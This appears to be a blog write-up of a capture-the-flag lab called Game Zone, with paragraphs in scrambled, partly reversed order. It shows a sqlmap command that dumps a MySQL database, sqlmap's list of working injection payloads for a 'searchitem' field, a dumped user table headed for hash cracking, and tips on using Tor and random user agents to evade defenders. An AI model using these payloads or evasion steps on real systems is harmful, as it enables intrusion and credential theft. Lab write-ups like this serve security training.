![]() I used the Hash Type Identifier (n.d.) to work out that this hash was generated with the SHA-256 algorithm. With a username and hashed password at hand, I can now proceed to crack the hash with John the Ripper ( OpenWall, n.d.). I have split the full hash into two rows so that the table can be easier to read. Note that there is only one row in the table depicted by Fig. 5) has a lot more useful information: both the username and pwd field - the second field being a hashed password of its respective username.įigure 5: formatted table of the user table dump. The post table just contains video game titles and descriptions of them. I noticed two tables, the post table and the user table. I will not be discussing the technical aspects of these injections, but for anyone interested in a comprehensive treatment, I recommend the book SQL Injection Attacks and Defense ( Clarke, 2012).Īfter sqlmap finished dumping the MySQL instance from the target machine, I examined the tables that it dumped. The input text box is vulnerable to four different kinds of SQL injection: a UNION-query based SQL injection, a boolean-based blind SQL injection, an error-based SQL injection and a time-based blind SQL injection. Sqlmap reported the following information regarding the kinds of SQL injection that has been identified: sqlmap identified the following injection point(s) with a total of 90 HTTP(s) requests: - Parameter: searchitem (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: searchitem=-2335' OR 7043=7043# Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: searchitem=dna deniers' AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(7775=7775,1))),0x71786a7871),7775)- aOTf Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchitem=dna deniers' AND (SELECT 1312 FROM (SELECT(SLEEP(5)))EjBJ)- fvCO Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: searchitem=dna deniers’ UNION ALL SELECT NULL,CONCAT(0x716b627171,0圆a41586165704d534f575655686848776e59524f666c767767504672656e4c50695148467942434e,0x71786a7871),NULL#. Protip: in a real world red teaming engagement, the -tor flag can be used to tunnel sqlmap requests and network traffic through the Tor Anonymity software ( Tor Project, n.d.), which can further baffle any system administrators or security analysts. The -r flag specifies that request text file that I saved a moment ago, the -dbms flag specifies the database management system (MySQL in this case) that the target system is running and the -dump flag instructs sqlmap to dump the entire database.įinally, the -random-agent flag instruct sqlmap to use random browser user agent strings, which can confuse any systems administrators or security analysts that are on the lookout for hackers. To do this, I started up a terminal on my AttackBox, changed directories to my Game Zone project files and started sqlmap with the following parameters: └─$ sqlmap -random-agent -r requests.txt -dbms=mysql -dump The request can be passed off to a tool called sqlmap (n.d.), a tool that automates the process of exploiting SQL injection vulnerability vectors. Figure 4: The POST request with the potential SQL Injection vector. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |